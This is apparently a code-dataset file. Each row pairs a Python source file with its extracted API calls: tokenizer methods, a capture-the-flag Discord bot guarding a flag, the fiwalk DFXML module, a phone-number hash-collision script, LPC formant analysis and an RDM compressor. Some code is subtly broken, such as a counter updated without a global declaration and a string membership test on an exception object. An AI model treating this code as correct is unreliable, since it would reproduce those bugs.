return self._tokenize(text)
def convert_tokens_to_string(self, tokens):
out_string = " ".join(tokens).replace(" ##", "").strip()
return out_string
def num_special_tokens_to_add(self, pair=False):
token_ids_0 = []
token_ids_1 = []
return len(
self.build_inputs_with_special_tokens(
token_ids_0, token_ids_1 if pair else None))
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
_cls = [self.cls_token_id]
_sep = [self.sep_token_id]
return _cls + token_ids_0 + _sep + token_ids_1 + _sep
def build_offset_mapping_with_special_tokens(self,
offset_mapping_0,
offset_mapping_1=None):
if offset_mapping_1 is None:
return [(0, 0)] + offset_mapping_0 + [(0, 0)]
return [(0, 0)] + offset_mapping_0 + [(0, 0)
] + offset_mapping_1 + [(0, 0)]
def create_token_type_ids_from_sequences(self,
token_ids_0,
token_ids_1=None):
_sep = [self.sep_token_id]
_cls = [self.cls_token_id]
if token_ids_1 is None:
return len(_cls + token_ids_0 + _sep) * [0]
return len(_cls + token_ids_0 + _sep) * [0] + len(token_ids_1 +
_sep) * [1]
def get_special_tokens_mask(self,
token_ids_0,
token_ids_1=None,
already_has_special_tokens=False):
if already_has_special_tokens:
if token_ids_1 is not None:
raise ValueError(
"You should not supply a second sequence if the provided sequence of "
"ids is already formatted with special tokens for the model."
)
return list(
map(
lambda x: 1
if x in [self.sep_token_id, self.cls_token_id] else 0,
token_ids_0))
if token_ids_1 is not None:
return [1] + ([0] * len(token_ids_0)) + [1] + (
[0] * len(token_ids_1)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1]
| [
"pypinyin.pinyin",
"os.path.join",
"os.path.isfile",
"numpy.array",
"json.load"
] | [((961, 997), 'os.path.join', 'os.path.join', (['bert_path', '"""vocab.txt"""'], {}), "(bert_path, 'vocab.txt')\n", (973, 997), False, 'import os\n'), ((1020, 1053), 'os.path.join', 'os.path.join', (['bert_path', '"""config"""'], {}), "(bert_path, 'config')\n", (1032, 1053), False, 'import os\n'), ((2900, 2919), 'numpy.array', 'np.array', (['input_ids'], {}), '(input_ids)\n', (2908, 2919), True, 'import numpy as np\n'), ((3626, 3729), 'pypinyin.pinyin', 'pinyin', (['sentence'], {'style': 'Style.TONE3', 'heteronym': '(True)', 'errors': "(lambda x: [['not chinese'] for _ in x])"}), "(sentence, style=Style.TONE3, heteronym=True, errors=lambda x: [[\n 'not chinese'] for _ in x])\n", (3632, 3729), False, 'from pypinyin import Style, pinyin\n'), ((1069, 1095), 'os.path.isfile', 'os.path.isfile', (['vocab_file'], {}), '(vocab_file)\n', (1083, 1095), False, 'import os\n'), ((1671, 1685), 'json.load', 'json.load', (['fin'], {}), '(fin)\n', (1680, 1685), False, 'import json\n'), ((1855, 1869), 'json.load', 'json.load', (['fin'], {}), '(fin)\n', (1864, 1869), False, 'import json\n'), ((2046, 2060), 'json.load', 'json.load', (['fin'], {}), '(fin)\n', (2055, 2060), False, 'import json\n'), ((1551, 1595), 'os.path.join', 'os.path.join', (['config_path', '"""pinyin_map.json"""'], {}), "(config_path, 'pinyin_map.json')\n", (1563, 1595), False, 'import os\n'), ((1738, 1781), 'os.path.join', 'os.path.join', (['config_path', '"""id2pinyin.json"""'], {}), "(config_path, 'id2pinyin.json')\n", (1750, 1781), False, 'import os\n'), ((1921, 1968), 'os.path.join', 'os.path.join', (['config_path', '"""pinyin2tensor.json"""'], {}), "(config_path, 'pinyin2tensor.json')\n", (1933, 1968), False, 'import os\n'), ((2941, 2961), 'numpy.array', 'np.array', (['pinyin_ids'], {}), '(pinyin_ids)\n', (2949, 2961), True, 'import numpy as np\n'), ((5864, 5964), 'pypinyin.pinyin', 'pinyin', (['token'], {'style': 'Style.TONE3', 'heteronym': '(True)', 'errors': "(lambda x: [['not chinese'] for _ in x])"}), "(token, style=Style.TONE3, heteronym=True, errors=lambda x: [[\n 'not chinese'] for _ in x])\n", (5870, 5964), False, 'from pypinyin import Style, pinyin\n')] |
# bot.py
import os
import discord
from discord.ext import commands
from dotenv import load_dotenv
from time import sleep
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
try:
with open('/app/flag.txt', 'r') as r:
FLAG = r.read().strip()
except FileNotFoundError:
FLAG = os.getenv('FLAG', 'bts{tmpflag}')
prefix = "!!"
accepted_role = "Mr.Stark"
bot = commands.Bot(command_prefix=prefix, case_insensitive=True)
bot.remove_command("help")
@bot.event
async def on_ready():
print('### Working as {0.user}'.format(bot))
@commands.guild_only()
@bot.command()
async def secret(ctx):
role = discord.utils.get(ctx.guild.roles, name=accepted_role)
if role in ctx.author.roles:
await ctx.send(f"Here is secret for you, sir: `{FLAG}`")
else:
await ctx.send(f":no_entry_sign: I am sorry {ctx.author.mention}, but you have no power of `{accepted_role}` here")
@commands.guild_only()
@bot.command()
async def armor(ctx):
role = discord.utils.get(ctx.guild.roles, name=accepted_role)
if role in ctx.author.roles:
await ctx.send(f"You armor will be delivered shortly, sir.")
sleep(0.5)
await ctx.send(f"Safe journey {ctx.author.mention}. :rocket:")
else:
await ctx.send(f"You armor will be delivered shortly, sir.")
await ctx.send(f":no_entry_sign: Wait {ctx.author.mention}, you are not `{accepted_role}` :no_entry_sign:")
@commands.guild_only()
@bot.command()
async def friday(ctx):
role = discord.utils.get(ctx.guild.roles, name=accepted_role)
if role in ctx.author.roles:
await ctx.send(f"Check this out: https://www.youtube.com/watch?v=cjgldht4PKw")
else:
await ctx.send(f":no_entry_sign: I am sorry {ctx.author.mention}, but you have no power of `{accepted_role}` :no_entry_sign:")
@commands.guild_only()
@bot.command()
async def ultron(ctx):
await ctx.send(f":shield: Thanks to {ctx.author.mention}, the Earth will have it's own shield :shield:")
@commands.guild_only()
@bot.command()
async def vision(ctx):
await ctx.send(f":superhero: Hi {ctx.author.mention}, you can call me Vision from now on :superhero:")
@commands.guild_only()
@bot.command()
async def grid(ctx):
await ctx.send(f":flag_no: No worries. I'll hide in the Grid, sir :flag_no:")
@commands.guild_only()
@bot.command()
async def help(ctx):
help_desc = f"Here is a little help for you, sir. Available of commands can be seen below."
e = discord.Embed(title=":question: Help :question:", description=help_desc)
avengers = f"""\
`{prefix}ultron` - protect the Earth
`{prefix}vision` - turn into Vision
`{prefix}grid` - hide in the Internet
"""
e.add_field(name="***Avengers***", value=avengers)
stark = f"""\
`{prefix}armor` - summon Mr. Stark's armor
`{prefix}friday` - call for replacement
`{prefix}secret` - reveal one of Mr. Stark's secrets
"""
e.add_field(name="***Stark***", value=stark)
await ctx.send(embed=e)
@bot.event
async def on_command_error(ctx, error):
if isinstance(error, commands.errors.CommandNotFound):
e = discord.Embed(title=":exclamation: No such command :exclamation:", description="Try `!!help`")
await ctx.send(embed=e)
elif "403 Forbidden" in error:
return
else:
print(f"---- Unknown error: {error} ----")
return
bot.run(TOKEN) | [
"os.getenv",
"discord.ext.commands.Bot",
"discord.utils.get",
"discord.ext.commands.guild_only",
"time.sleep",
"dotenv.load_dotenv",
"discord.Embed"
] | [((123, 136), 'dotenv.load_dotenv', 'load_dotenv', ([], {}), '()\n', (134, 136), False, 'from dotenv import load_dotenv\n'), ((145, 171), 'os.getenv', 'os.getenv', (['"""DISCORD_TOKEN"""'], {}), "('DISCORD_TOKEN')\n", (154, 171), False, 'import os\n'), ((371, 429), 'discord.ext.commands.Bot', 'commands.Bot', ([], {'command_prefix': 'prefix', 'case_insensitive': '(True)'}), '(command_prefix=prefix, case_insensitive=True)\n', (383, 429), False, 'from discord.ext import commands\n'), ((542, 563), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (561, 563), False, 'from discord.ext import commands\n'), ((902, 923), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (921, 923), False, 'from discord.ext import commands\n'), ((1420, 1441), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (1439, 1441), False, 'from discord.ext import commands\n'), ((1813, 1834), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (1832, 1834), False, 'from discord.ext import commands\n'), ((1984, 2005), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (2003, 2005), False, 'from discord.ext import commands\n'), ((2153, 2174), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (2172, 2174), False, 'from discord.ext import commands\n'), ((2295, 2316), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (2314, 2316), False, 'from discord.ext import commands\n'), ((613, 667), 'discord.utils.get', 'discord.utils.get', (['ctx.guild.roles'], {'name': 'accepted_role'}), '(ctx.guild.roles, name=accepted_role)\n', (630, 667), False, 'import discord\n'), ((972, 1026), 'discord.utils.get', 'discord.utils.get', (['ctx.guild.roles'], {'name': 'accepted_role'}), '(ctx.guild.roles, name=accepted_role)\n', (989, 1026), False, 'import discord\n'), ((1491, 1545), 'discord.utils.get', 'discord.utils.get', (['ctx.guild.roles'], {'name': 'accepted_role'}), '(ctx.guild.roles, name=accepted_role)\n', (1508, 1545), False, 'import discord\n'), ((2457, 2529), 'discord.Embed', 'discord.Embed', ([], {'title': '""":question: Help :question:"""', 'description': 'help_desc'}), "(title=':question: Help :question:', description=help_desc)\n", (2470, 2529), False, 'import discord\n'), ((289, 322), 'os.getenv', 'os.getenv', (['"""FLAG"""', '"""bts{tmpflag}"""'], {}), "('FLAG', 'bts{tmpflag}')\n", (298, 322), False, 'import os\n'), ((1137, 1147), 'time.sleep', 'sleep', (['(0.5)'], {}), '(0.5)\n', (1142, 1147), False, 'from time import sleep\n'), ((3091, 3189), 'discord.Embed', 'discord.Embed', ([], {'title': '""":exclamation: No such command :exclamation:"""', 'description': '"""Try `!!help`"""'}), "(title=':exclamation: No such command :exclamation:',\n description='Try `!!help`')\n", (3104, 3189), False, 'import discord\n')] |
#
# pr9_3_1
from audiolazy import lazy_lpc
from scipy.signal import lfilter, find_peaks
from LPC import LPC
from Universal import *
if __name__ == '__main__':
filename = 'snn27.wav'
speech = Speech()
x, fs = speech.audioread(filename, None) # read one frame data
u = lfilter(b=np.array([1, -0.99]), a=1, x=x) # pre-emphasis
wlen = len(u) # frame length
p = 12 # LPC order
ar = lazy_lpc.lpc.autocor(u, p) # LPC coefficients
ar0 = ar.numerator
U = LPC().lpcar2pf(ar0, 255) # LPC coefficients --> spectrum
freq = np.arange(257) * fs / 512 # frequency scale in the frequency domain
df = fs / 512 # frequency resolution
U_log = 10 * np.log10(U)
Loc, _ = find_peaks(U.reshape(np.size(U), )) # peak location
Val = U[Loc] # peak value
LenLoc = len(Loc) # peak number
F = np.zeros(LenLoc) # format frequency
BW = np.zeros(LenLoc) # band width
for k in range(LenLoc):
m = Loc[k] # set m, m-1, m+1
m1 = m - 1
m2 = m + 1
p = Val[k] # set P(m), P(m-1), P(m+1)
p1 = U[m1]
p2 = U[m2]
aa = (p1 + p2) / 2 - p # (9-3-4)
bb = (p2 - p1) / 2
cc = p
dm = -bb / 2 / aa # (9-3-6)
pp = - bb * bb / 4 / aa + cc # (9-3-8)
m_new = m + dm
bf = -np.sqrt(bb * bb - 4 * aa * (cc - pp / 2)) / aa # (9-3-13)
F[k] = (m_new - 1) * df # (9-3-7)
BW[k] = bf * df # (9-3-14)
np.set_printoptions(precision=2)
print('Format = {}'.format(F))
print('Band Width = {}'.format(BW))
# figure
plt.figure(figsize=(16, 9))
plt.subplot(2, 1, 1)
plt.plot(u)
plt.xlabel('Sample points')
plt.ylabel('Amplitude')
plt.title('Pre-emphasis Signal Spectrum')
plt.axis([0, wlen, -0.5, 0.5])
plt.subplot(2, 1, 2)
plt.plot(freq, U)
for k in range(LenLoc):
plt.plot(freq[Loc[k]], Val[k], 'r', marker='o', markersize=8)
plt.plot(np.array([freq[Loc[k]], freq[Loc[k]]], dtype=object), np.array([0, Val[k]], dtype=object), 'r-.',
linewidth=2)
plt.xlabel('Frequency [Hz]')
plt.ylabel('Amplitude [dB]')
plt.title('Vocal Transfer Function Power Spectrum')
plt.axis([0, 4000, 0, max(U) + 2])
plt.savefig('images/lpc_format_detection.png', bbox_inches='tight', dpi=600)
plt.show()
| [
"audiolazy.lazy_lpc.lpc.autocor",
"LPC.LPC"
] | [((391, 417), 'audiolazy.lazy_lpc.lpc.autocor', 'lazy_lpc.lpc.autocor', (['u', 'p'], {}), '(u, p)\n', (411, 417), False, 'from audiolazy import lazy_lpc\n'), ((463, 468), 'LPC.LPC', 'LPC', ([], {}), '()\n', (466, 468), False, 'from LPC import LPC\n')] |
#!/usr/bin/env python
# This software was developed in whole or in part by employees of the
# Federal Government in the course of their official duties, and with
# other Federal assistance. Pursuant to title 17 Section 105 of the
# United States Code portions of this software authored by Federal
# employees are not subject to copyright protection within the United
# States. For portions not authored by Federal employees, the Federal
# Government has been granted unlimited rights, and no claim to
# copyright is made. The Federal Government assumes no responsibility
# whatsoever for its use by other parties, and makes no guarantees,
# expressed or implied, about its quality, reliability, or any other
# characteristic.
#
# We would appreciate acknowledgement if the software is used.
__version__="0.7.0"
"""fiwalk module
This is the part of dfxml that is dependent on fiwalk.py
"""
import os
import sys
sys.path.append( os.path.join(os.path.dirname(__file__), ".."))
import dfxml
from sys import stderr
from subprocess import Popen,PIPE
ALLOC_ONLY = 1
fiwalk_cached_installed_version = None
def fiwalk_installed_version(fiwalk='fiwalk'):
"""Return the current version of fiwalk that is installed"""
global fiwalk_cached_installed_version
if fiwalk_cached_installed_version:
return fiwalk_cached_installed_version
from subprocess import Popen,PIPE
import re
for line in Popen([fiwalk,'-V'],stdout=PIPE).stdout.read().decode('utf-8').split("\n"):
g = re.search("^FIWalk Version:\s+(.*)$",line)
if g:
fiwalk_cached_installed_version = g.group(1)
return fiwalk_cached_installed_version
g = re.search("^SleuthKit Version:\s+(.*)$",line)
if g:
fiwalk_cached_installed_version = g.group(1)
return fiwalk_cached_installed_version
return None
class XMLDone(Exception):
def __init__(self,value):
self.value = value
class version:
def __init__(self):
self.cdata = ""
self.in_element = []
self.version = None
def start_element(self,name,attrs):
if(name=='volume'): # too far?
raise XMLDone(None)
self.in_element += [name]
self.cdata = ""
def end_element(self,name):
if ("fiwalk" in self.in_element) and ("creator" in self.in_element) and ("version" in self.in_element):
raise XMLDone(self.cdata)
if ("fiwalk" in self.in_element) and ("fiwalk_version" in self.in_element):
raise XMLDone(self.cdata)
if ("version" in self.in_element) and ("dfxml" in self.in_element) and ("creator" in self.in_element):
raise XMLDone(self.cdata)
self.in_element.pop()
self.cdata = ""
def char_data(self,data):
self.cdata += data
def get_version(self,fn):
import xml.parsers.expat
p = xml.parsers.expat.ParserCreate()
p.StartElementHandler = self.start_element
p.EndElementHandler = self.end_element
p.CharacterDataHandler = self.char_data
try:
p.ParseFile(open(fn,'rb'))
except XMLDone as e:
return e.value
except xml.parsers.expat.ExpatError:
return None # XML error
def fiwalk_xml_version(filename=None):
"""Returns the fiwalk version that was used to create an XML file.
Uses the "quick and dirty" approach to getting to getting out the XML version."""
p = version()
return p.get_version(filename)
################################################################
def E01_glob(fn):
import os.path
"""If the filename ends .E01, then glob it. Currently only handles E01 through EZZ"""
ret = [fn]
if fn.endswith(".E01") and os.path.exists(fn):
fmt = fn.replace(".E01",".E%02d")
for i in range(2,100):
f2 = fmt % i
if os.path.exists(f2):
ret.append(f2)
else:
return ret
# Got through E99, now do EAA through EZZ
fmt = fn.replace(".E01",".E%c%c")
for i in range(0,26):
for j in range(0,26):
f2 = fmt % (i+ord('A'),j+ord('A'))
if os.path.exists(f2):
ret.append(f2)
else:
return ret
return ret # don't do F01 through F99, etc.
return ret
def fiwalk_xml_stream(imagefile=None,flags=0,fiwalk="fiwalk",fiwalk_args=""):
""" Returns an fiwalk XML stream given a disk image by running fiwalk."""
if flags & ALLOC_ONLY: fiwalk_args += "-O"
from subprocess import call,Popen,PIPE
# Make sure we have a valid fiwalk
try:
res = Popen([fiwalk,'-V'],stdout=PIPE).communicate()[0]
except OSError:
raise RuntimeError("Cannot execute fiwalk executable: "+fiwalk)
cmd = [fiwalk,'-x']
if fiwalk_args: cmd += fiwalk_args.split()
p = Popen(cmd + E01_glob(imagefile.name),stdout=PIPE)
return p.stdout
def fiwalk_using_sax(imagefile=None,xmlfile=None,fiwalk="fiwalk",flags=0,callback=None,fiwalk_args=""):
"""Processes an image using expat, calling a callback for every file object encountered.
If xmlfile is provided, use that as the xmlfile, otherwise runs fiwalk."""
import dfxml
if xmlfile==None:
xmlfile = fiwalk_xml_stream(imagefile=imagefile,flags=flags,fiwalk=fiwalk,fiwalk_args=fiwalk_args)
r = dfxml.fileobject_reader(flags=flags)
r.imagefile = imagefile
r.process_xml_stream(xmlfile,callback)
def fileobjects_using_sax(imagefile=None,xmlfile=None,fiwalk="fiwalk",flags=0):
ret = []
fiwalk_using_sax(imagefile=imagefile,xmlfile=xmlfile,fiwalk=fiwalk,flags=flags,
callback = lambda fi:ret.append(fi))
return ret
def fileobjects_using_dom(imagefile=None,xmlfile=None,fiwalk="fiwalk",flags=0,callback=None):
"""Processes an image using expat, calling a callback for every file object encountered.
If xmlfile is provided, use that as the xmlfile, otherwise runs fiwalk."""
import dfxml
if xmlfile==None:
xmlfile = fiwalk_xml_stream(imagefile=imagefile,flags=flags,fiwalk=fiwalk)
return dfxml.fileobjects_dom(xmlfile=xmlfile,imagefile=imagefile,flags=flags)
ctr = 0
def cb_count(fn):
global ctr
ctr += 1
if __name__=="__main__":
import sys
for fn in sys.argv[1:]:
print("{} contains fiwalk version {}".format(fn,fiwalk_xml_version(fn)))
# Count the number of files
fiwalk_using_sax(xmlfile=open(fn,'rb'),callback=cb_count)
print("Files: {}".format(ctr))
| [
"os.path.exists",
"subprocess.Popen",
"dfxml.fileobject_reader",
"os.path.dirname",
"dfxml.fileobjects_dom",
"re.search"
] | [((5442, 5478), 'dfxml.fileobject_reader', 'dfxml.fileobject_reader', ([], {'flags': 'flags'}), '(flags=flags)\n', (5465, 5478), False, 'import dfxml\n'), ((6201, 6273), 'dfxml.fileobjects_dom', 'dfxml.fileobjects_dom', ([], {'xmlfile': 'xmlfile', 'imagefile': 'imagefile', 'flags': 'flags'}), '(xmlfile=xmlfile, imagefile=imagefile, flags=flags)\n', (6222, 6273), False, 'import dfxml\n'), ((948, 973), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (963, 973), False, 'import os\n'), ((1506, 1550), 're.search', 're.search', (['"""^FIWalk Version:\\\\s+(.*)$"""', 'line'], {}), "('^FIWalk Version:\\\\s+(.*)$', line)\n", (1515, 1550), False, 'import re\n'), ((1683, 1730), 're.search', 're.search', (['"""^SleuthKit Version:\\\\s+(.*)$"""', 'line'], {}), "('^SleuthKit Version:\\\\s+(.*)$', line)\n", (1692, 1730), False, 'import re\n'), ((3767, 3785), 'os.path.exists', 'os.path.exists', (['fn'], {}), '(fn)\n', (3781, 3785), False, 'import os\n'), ((3900, 3918), 'os.path.exists', 'os.path.exists', (['f2'], {}), '(f2)\n', (3914, 3918), False, 'import os\n'), ((4222, 4240), 'os.path.exists', 'os.path.exists', (['f2'], {}), '(f2)\n', (4236, 4240), False, 'import os\n'), ((4720, 4754), 'subprocess.Popen', 'Popen', (["[fiwalk, '-V']"], {'stdout': 'PIPE'}), "([fiwalk, '-V'], stdout=PIPE)\n", (4725, 4754), False, 'from subprocess import call, Popen, PIPE\n'), ((1418, 1452), 'subprocess.Popen', 'Popen', (["[fiwalk, '-V']"], {'stdout': 'PIPE'}), "([fiwalk, '-V'], stdout=PIPE)\n", (1423, 1452), False, 'from subprocess import call, Popen, PIPE\n')] |
# Program to check how effective is Java's String's Hash Collision
# for generating hash codes for Indian Phone No.s
import random
from pprint import pprint
SAMPLE_SPACE = 10000
def genJavaHashCode(phone: str) -> int:
"""
s[0]*31^(n-1) + s[1]*31^(n-2) + … + s[n-1]
where :
s[i] – is the ith character of the string
n – is the length of the string, and
^ – indicates exponentiation
"""
return sum( ord(phone[i]) * 31**(len(phone)-i-1) for i in range(len(phone)))
def genPhoneNo():
"""
Indian Phone No.s usually begin with 7, 8, or 9.
( This doesn't include the country code +91. )
Others are usually scam calls or from other countries.
They are 10 digits long.
"""
return str(random.randint(7, 9)) + ''.join(str(random.randint(0, 9)) for _ in range(9))
phone_nos = set([genPhoneNo() for _ in range(SAMPLE_SPACE)])
hash_to_phone = {}
hashCollisions = 0
def populateHashMap():
for phone in phone_nos:
hashCode = genJavaHashCode(phone)
if hashCode in hash_to_phone.keys():
hashCollisions += 1
else:
hash_to_phone[hashCode] = phone
if __name__ == '__main__':
# pprint(phone_nos)
populateHashMap()
print(f"Hash Collisions: {hashCollisions}")
print(f"hashCollisions rate = {hashCollisions / len(phone_nos)}")
| [
"random.randint"
] | [((764, 784), 'random.randint', 'random.randint', (['(7)', '(9)'], {}), '(7, 9)\n', (778, 784), False, 'import random\n'), ((800, 820), 'random.randint', 'random.randint', (['(0)', '(9)'], {}), '(0, 9)\n', (814, 820), False, 'import random\n')] |
import os
TWO_WEEKS = 1209600
SECRET_KEY = os.getenv('SECRET_KEY', None)
assert SECRET_KEY
TOKEN_EXPIRES = TWO_WEEKS
DATABASE_URL = os.getenv(
'DATABASE_URL',
'postgres://postgres@{0}:5432/postgres'.format(os.getenv('DB_PORT_5432_TCP_ADDR', None)))
assert DATABASE_URL
REDIS_HOST = os.getenv('REDIS_HOST', os.getenv('REDIS_PORT_6379_TCP_ADDR', None))
REDIS_PASSWORD = os.getenv('REDIS_PASSWORD', None)
| [
"os.getenv"
] | [((46, 75), 'os.getenv', 'os.getenv', (['"""SECRET_KEY"""', 'None'], {}), "('SECRET_KEY', None)\n", (55, 75), False, 'import os\n'), ((382, 415), 'os.getenv', 'os.getenv', (['"""REDIS_PASSWORD"""', 'None'], {}), "('REDIS_PASSWORD', None)\n", (391, 415), False, 'import os\n'), ((320, 363), 'os.getenv', 'os.getenv', (['"""REDIS_PORT_6379_TCP_ADDR"""', 'None'], {}), "('REDIS_PORT_6379_TCP_ADDR', None)\n", (329, 363), False, 'import os\n'), ((219, 259), 'os.getenv', 'os.getenv', (['"""DB_PORT_5432_TCP_ADDR"""', 'None'], {}), "('DB_PORT_5432_TCP_ADDR', None)\n", (228, 259), False, 'import os\n')] |
import numpy as np
class Compressor():
def __init__(self,
num_particles: int, num_spin_orbitals: int, rdm_ideal=None) -> None:
self.num_particles = num_particles
self.num_spin_orbitals = num_spin_orbitals
self.rdm_ideal = rdm_ideal
pass
def compress(self, rdm):
N = self.num_spin_orbitals ** 2 // 4
# get num of elements by square formula of triangle
S = self._get_num_elems_of_tri_mat(N)
n = self.num_spin_orbitals // 2
# mat = self._tensor2matrix(rdm)
utri_arr = np.zeros((3*S,))
utri_arr[: S] = \
self._compress_matrix_to_upper_triangle_array(self._tensor2matrix(rdm[:n, :n, :n, :n]))
utri_arr[S: 2*S] = \
self._compress_matrix_to_upper_triangle_array(self._tensor2matrix(rdm[:n, n:, :n, n:]))
utri_arr[2*S: ] = \
self._compress_matrix_to_upper_triangle_array(self._tensor2matrix(rdm[n:, n:, n:, n:]))
return utri_arr
def decompress(self, utri_arr):
# rdm = np.zeros((self.num_spin_orbitals ** 2,) * 2) # matrix
rdm = np.zeros((self.num_spin_orbitals,) * 4) # tensor
N = self.num_spin_orbitals ** 2 // 4
n = self.num_spin_orbitals // 2
# get num of elements by square formula of triangle
S = self._get_num_elems_of_tri_mat(N)
# restore from the second triangle
A = self._restore_matrix_by_upper_triangle_array(utri_arr[S: 2*S], N)
A_tensor = self._matrix2tensor(A)
B = - A_tensor.transpose([0, 1, 3, 2])
# B = self._tensor2matrix(B)
C = A_tensor.transpose([1, 0, 3, 2])
# C = self._tensor2matrix(C)
D = - A_tensor.transpose([1, 0, 2, 3])
# restore middle 4
# rdm[N: 2*N, N: 2*N] = A
# diff = np.linalg.norm(self._tensor2matrix(self.rdm_ideal)[N: 2*N, N: 2*N] - A)
rdm[:n, n:, :n, n:] = A_tensor
# diff = np.linalg.norm(self.rdm_ideal[:n, n:, :n, n:] - A_tensor)
# print('A', diff)
# rdm[N: 2*N, 2*N: 3*N] = B
# diff = np.linalg.norm(self._tensor2matrix(self.rdm_ideal)[N: 2*N, 2*N: 3*N] - B)
rdm[:n, n:, n:, :n] = B
# diff = np.linalg.norm(self.rdm_ideal[:n, n:, n:, :n] - B)
# print('B', diff)
# rdm[2*N: 3*N, 2*N: 3*N] = C
# diff = np.linalg.norm(self._tensor2matrix(self.rdm_ideal)[2*N: 3*N, 2*N: 3*N] - C)
rdm[n:, :n, n:, :n] = C
# diff = np.linalg.norm(self.rdm_ideal[n:, :n, n:, :n] - C)
# print('C', diff)
rdm[n:, :n, :n, n:] = D
# diff = np.linalg.norm(self.rdm_ideal[n:, :n, :n, n:] - D)
# print('D', diff)
# rdm = self._tensor2matrix(rdm)
# restore upper left
rdm[:n, :n, :n, :n] = \
self._matrix2tensor(self._restore_matrix_by_upper_triangle_array(utri_arr[: S], N))
# diff = np.linalg.norm(self.rdm_ideal[:n, :n, :n, :n] - rdm[:n, :n, :n, :n])
# print('upper left', diff)
# restore button right
rdm[n:, n:, n:, n:] = \
self._matrix2tensor(self._restore_matrix_by_upper_triangle_array(utri_arr[2*S:], N))
# diff = np.linalg.norm(self.rdm_ideal[n:, n:, n:, n:] - rdm[n:, n:, n:, n:])
# print('button right', diff)
# rdm = self._tensor2matrix(rdm)
# utri = np.triu(rdm)
# diag = np.diag(np.diag(rdm))
# utri -= diag
# rdm = utri + utri.T + diag
return rdm #self._matrix2tensor(rdm)
@staticmethod
def _restore_matrix_by_upper_triangle_array(utri_arr, n):
cnt = 0
utri = np.zeros((n,) * 2) # upper triangular matrix
for i in range(n):
for j in range(i, n):
utri[i, j] = utri_arr[cnt]
cnt += 1
diag = np.diag(np.diag(utri))
mat = utri + utri.T - diag
return mat
@staticmethod
def _compress_matrix_to_upper_triangle_array(mat):
n = mat.shape[0]
num_elements = Compressor._get_num_elems_of_tri_mat(n)
utri_arr = np.zeros((num_elements))
cnt = 0
for i in range(n):
for j in range(i, n):
utri_arr[cnt] = mat[i, j]
cnt += 1
return utri_arr
@staticmethod
def _get_num_elems_of_tri_mat(n):
return (n + 1) * n // 2
@staticmethod
def _matrix2tensor(mat, transpose=False):
n = int(np.sqrt(mat.shape[0]))
if transpose:
tensor = mat.reshape((n,) * 4).transpose([0, 1, 3, 2])
else:
tensor = mat.reshape((n,) * 4)
return tensor
@staticmethod
def _tensor2matrix(tensor, transpose=False):
n = tensor.shape[0]
if transpose:
mat = tensor.transpose([0, 1, 3, 2]).reshape((n*n,) * 2)
else:
mat = tensor.reshape((n*n,) * 2)
return mat
@staticmethod
def _utri_mat2real_sym_mat(utri):
diag = np.diag(np.diag(utri))
mat = utri + utri.T - diag
return mat
| [
"numpy.zeros",
"numpy.sqrt",
"numpy.diag"
] | [((577, 595), 'numpy.zeros', 'np.zeros', (['(3 * S,)'], {}), '((3 * S,))\n', (585, 595), True, 'import numpy as np\n'), ((1132, 1171), 'numpy.zeros', 'np.zeros', (['((self.num_spin_orbitals,) * 4)'], {}), '((self.num_spin_orbitals,) * 4)\n', (1140, 1171), True, 'import numpy as np\n'), ((3642, 3660), 'numpy.zeros', 'np.zeros', (['((n,) * 2)'], {}), '((n,) * 2)\n', (3650, 3660), True, 'import numpy as np\n'), ((4091, 4113), 'numpy.zeros', 'np.zeros', (['num_elements'], {}), '(num_elements)\n', (4099, 4113), True, 'import numpy as np\n'), ((3840, 3853), 'numpy.diag', 'np.diag', (['utri'], {}), '(utri)\n', (3847, 3853), True, 'import numpy as np\n'), ((4462, 4483), 'numpy.sqrt', 'np.sqrt', (['mat.shape[0]'], {}), '(mat.shape[0])\n', (4469, 4483), True, 'import numpy as np\n'), ((5009, 5022), 'numpy.diag', 'np.diag', (['utri'], {}), '(utri)\n', (5016, 5022), True, 'import numpy as np\n')] |